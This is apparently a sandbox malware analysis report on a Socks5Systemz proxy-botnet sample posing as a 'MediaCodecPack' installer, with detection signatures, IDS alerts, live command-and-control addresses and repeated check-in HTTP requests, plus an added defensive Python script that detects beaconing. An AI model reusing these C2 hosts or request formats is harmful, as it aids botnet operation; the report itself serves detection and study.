
Windows Analysis Report
newwork.exe.1.exe

Overview

General Information

Sample name: newwork.exe.1.exe
Analysis ID: 1577462
MD5: 27b4fa67c0810bc212077971a00854ea
SHA1: 39d4dbe69f339c608a3f9ecf7f718c25e1c0dfbb
SHA256: 2fc18ce155e0b723ffe70b0ed7fa5ff85a03b50d90367e8a1c5591e88af2089e
Tags: bulletproof, exe, Socks5Systemz, user-abus3reports

Detection

Socks5Systemz
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • newwork.exe.1.exe (PID: 8168 cmdline: "C:\Users\user\Desktop\newwork.exe.1.exe" MD5: 27B4FA67C0810BC212077971A00854EA)
    • newwork.exe.1.tmp (PID: 7208 cmdline: "C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp" /SL5="$2047E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe" MD5: ED6A19AD054AD0172201AF725324781B)
      • mediacodecpack.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i MD5: 49FC2D4BA26F2EEF94CCC6B71EB0AD96)
  • cleanup
No configs have been found
Yara matches, dropped files:
Source | Rule | Description | Author
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-D6CVE.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\ProgramData\MediaCodecPack\MediaCodecPack.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Yara matches, memory dumps:
Source | Rule | Description | Author
00000003.00000000.1336954414.0000000000401000.00000020.00000001.01000000.00000009.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security
00000001.00000002.2575850575.0000000005A10000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000003.00000002.2575281871.0000000002C66000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security
Process Memory Space: mediacodecpack.exe PID: 7404 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security

Yara matches, unpacked PEs:
Source | Rule | Description | Author
3.0.mediacodecpack.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
                    No Sigma rule has matched
Suricata alerts, SID 2028765 (severity 3, ET JA3 Hash - [Abuse.ch] Possible Dridex):
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T13:50:44.078830+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49838 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:46.393102+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49848 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:52.215337+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49860 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:54.683435+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49866 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:57.372299+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49873 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:59.690513+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49881 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:02.248787+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49887 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:04.724066+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49896 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:07.197577+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49901 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:09.461347+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49905 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:11.743256+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49910 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:13.998036+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49916 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:16.560803+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49923 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:19.083606+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49930 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:21.596955+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49936 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:23.865961+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49943 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:26.136097+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49950 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:28.436908+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49956 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:30.915113+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49963 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:33.333519+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49969 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:35.870738+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49975 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:38.316315+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49981 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:40.821190+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49989 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:43.173050+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 49995 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:45.698502+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 50001 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:48.203505+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 50004 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:50.614745+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 50005 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:52.924243+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.10 | 50006 | 188.119.66.185 | 443 | TCP

Suricata alerts, SID 2803274 (severity 2, ETPRO MALWARE Common Downloader Header Pattern UH):
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T13:50:44.786700+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49838 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:47.182885+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49848 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:53.101821+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49860 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:55.402293+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49866 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:58.056391+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49873 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:00.489357+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49881 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:02.932989+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49887 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:05.514546+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49896 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:07.875652+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49901 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:10.181163+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49905 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:12.428721+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49910 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:14.806062+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49916 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:17.242829+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49923 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:19.761430+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49930 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:22.288127+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49936 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:24.562804+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49943 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:26.821610+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49950 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:29.120824+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49956 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:31.622068+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49963 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:34.088417+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49969 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:36.552860+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49975 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:39.002791+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49981 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:41.523825+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49989 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:43.939637+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49995 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:46.468759+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 50001 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:48.968184+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 50004 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:51.353310+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 50005 | 188.119.66.185 | 443 | TCP
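The two Suricata rules above fire on the same 28 TLS connections to 188.119.66.185:443. The JA3 rule's "Possible Dridex" name comes from the abuse.ch list the hash 51c64c77e60f3980eea90869b68c58a8 sits on; a JA3 hash identifies the TLS client stack, not a malware family, so it is not attribution. What the timestamps do show is a fixed-interval check-in roughly every 2.5 seconds. The script below is an added example, not part of the Joe Sandbox report: it takes the 28 SID 2028765 rows transcribed from the table (plus the single flow to 89.105.201.183:2024, with a timestamp constructed for illustration because the report gives none) and scores each destination for beacon-like regularity. The row layout, the thresholds and the function names are this example's own choices.

```python
"""Beacon-periodicity check over Suricata alert rows (added example)."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed from the report's SID 2028765 table: timestamp, source, destination.
# The last row's timestamp is made up; the report lists that flow without one.
ALERT_ROWS = """\
2024-12-18T13:50:44.078830+0100 192.168.2.10:49838 -> 188.119.66.185:443
2024-12-18T13:50:46.393102+0100 192.168.2.10:49848 -> 188.119.66.185:443
2024-12-18T13:50:52.215337+0100 192.168.2.10:49860 -> 188.119.66.185:443
2024-12-18T13:50:54.683435+0100 192.168.2.10:49866 -> 188.119.66.185:443
2024-12-18T13:50:57.372299+0100 192.168.2.10:49873 -> 188.119.66.185:443
2024-12-18T13:50:59.690513+0100 192.168.2.10:49881 -> 188.119.66.185:443
2024-12-18T13:51:02.248787+0100 192.168.2.10:49887 -> 188.119.66.185:443
2024-12-18T13:51:04.724066+0100 192.168.2.10:49896 -> 188.119.66.185:443
2024-12-18T13:51:07.197577+0100 192.168.2.10:49901 -> 188.119.66.185:443
2024-12-18T13:51:09.461347+0100 192.168.2.10:49905 -> 188.119.66.185:443
2024-12-18T13:51:11.743256+0100 192.168.2.10:49910 -> 188.119.66.185:443
2024-12-18T13:51:13.998036+0100 192.168.2.10:49916 -> 188.119.66.185:443
2024-12-18T13:51:16.560803+0100 192.168.2.10:49923 -> 188.119.66.185:443
2024-12-18T13:51:19.083606+0100 192.168.2.10:49930 -> 188.119.66.185:443
2024-12-18T13:51:21.596955+0100 192.168.2.10:49936 -> 188.119.66.185:443
2024-12-18T13:51:23.865961+0100 192.168.2.10:49943 -> 188.119.66.185:443
2024-12-18T13:51:26.136097+0100 192.168.2.10:49950 -> 188.119.66.185:443
2024-12-18T13:51:28.436908+0100 192.168.2.10:49956 -> 188.119.66.185:443
2024-12-18T13:51:30.915113+0100 192.168.2.10:49963 -> 188.119.66.185:443
2024-12-18T13:51:33.333519+0100 192.168.2.10:49969 -> 188.119.66.185:443
2024-12-18T13:51:35.870738+0100 192.168.2.10:49975 -> 188.119.66.185:443
2024-12-18T13:51:38.316315+0100 192.168.2.10:49981 -> 188.119.66.185:443
2024-12-18T13:51:40.821190+0100 192.168.2.10:49989 -> 188.119.66.185:443
2024-12-18T13:51:43.173050+0100 192.168.2.10:49995 -> 188.119.66.185:443
2024-12-18T13:51:45.698502+0100 192.168.2.10:50001 -> 188.119.66.185:443
2024-12-18T13:51:48.203505+0100 192.168.2.10:50004 -> 188.119.66.185:443
2024-12-18T13:51:50.614745+0100 192.168.2.10:50005 -> 188.119.66.185:443
2024-12-18T13:51:52.924243+0100 192.168.2.10:50006 -> 188.119.66.185:443
2024-12-18T13:51:00.000000+0100 192.168.2.10:49854 -> 89.105.201.183:2024
"""

ROW_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")

MIN_FLOWS = 8           # fewer flows than this: periodicity is not meaningful
JITTER = 0.25           # an interval is "regular" if within +/-25% of the median
REGULAR_FRACTION = 0.8  # flag when at least 80% of the intervals are regular


def parse_rows(text):
    """Yield (timestamp, source IP, 'dst:port') for every well-formed row."""
    flows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%f%z")
        flows.append((ts, m["src"], f"{m['dst']}:{m['dport']}"))
    return flows


def score_destinations(flows):
    """Per destination: flow count, median inter-arrival, regular fraction, verdict."""
    by_dst = defaultdict(list)
    for ts, _src, dst in flows:
        by_dst[dst].append(ts)
    results = {}
    for dst, stamps in by_dst.items():
        stamps.sort()
        if len(stamps) < MIN_FLOWS:
            results[dst] = {"flows": len(stamps), "median_interval": None,
                            "regular_fraction": None, "beacon": False}
            continue
        intervals = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        med = statistics.median(intervals)
        lo, hi = med * (1 - JITTER), med * (1 + JITTER)
        regular = sum(lo <= d <= hi for d in intervals) / len(intervals)
        results[dst] = {"flows": len(stamps), "median_interval": round(med, 3),
                        "regular_fraction": round(regular, 3),
                        "beacon": regular >= REGULAR_FRACTION}
    return results


def beacon_report(text=ALERT_ROWS):
    return score_destinations(parse_rows(text))


if __name__ == "__main__":
    for dst, verdict in beacon_report().items():
        print(dst, verdict)
```

On the report's data the C2 destination gets a median interval of about 2.47 s with 26 of 27 intervals inside the jitter band (the one outlier is the 5.8 s gap between the second and third connection), which is what a sleep-loop check-in looks like; a single connection, such as the one to port 2024, is reported but not scored. The median is used rather than the mean so one long gap does not move the baseline.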


                    AV Detection

Source: https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4 | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e3008881325 | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8 | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 | Avira URL Cloud: Label: malware
Source: newwork.exe.1.exe | ReversingLabs: Detection: 15%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion, 1_2_0045D188
Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0045D254 ArcFourCrypt, 1_2_0045D254
Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0045D23C ArcFourCrypt, 1_2_0045D23C
Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_10001000 ISCryptGetVersion, 1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_10001130 ArcFourCrypt, 1_2_10001130

                    Compliance

Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Unpacked PE file: 3.2.mediacodecpack.exe.400000.0.unpack
Source: newwork.exe.1.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1
Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.10:49838 version: TLS 1.2
Source: Binary string: msvcp71.pdbx# source: is-VMCDM.tmp.1.dr
Source: Binary string: msvcr71.pdb< source: is-8I59M.tmp.1.dr
Source: Binary string: msvcp71.pdb source: is-VMCDM.tmp.1.dr
Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-UJAIS.tmp.1.dr
Source: Binary string: msvcr71.pdb source: is-8I59M.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00452A60 FindFirstFileA,GetLastError, 1_2_00452A60
Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose, 1_2_00474F88
Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 1_2_004980A4
Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00464158
Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose, 1_2_00462750
Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00463CDC
Source: global traffic | TCP traffic: 192.168.2.10:49854 -> 89.105.201.183:2024
Source: Joe Sandbox View | IP Address: 188.119.66.185
Source: Joe Sandbox View | IP Address: 89.105.201.183
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10 -> 188.119.66.185:443, 28 flows (source ports 49838, 49848, 49860, 49866, 49873, 49881, 49887, 49896, 49901, 49905, 49910, 49916, 49923, 49930, 49936, 49943, 49950, 49956, 49963, 49969, 49975, 49981, 49989, 49995, 50001, 50004, 50005, 50006)
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10 -> 188.119.66.185:443, 27 flows (source ports 49838, 49848, 49860, 49866, 49873, 49881, 49887, 49896, 49901, 49905, 49910, 49916, 49923, 49930, 49936, 49943, 49950, 49956, 49963, 49969, 49975, 49981, 49989, 49995, 50001, 50004, 50005)
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknown | TCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D02B95 WSASetLastError, WSARecv, WSASetLastError, select
                    Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 188.119.66.185
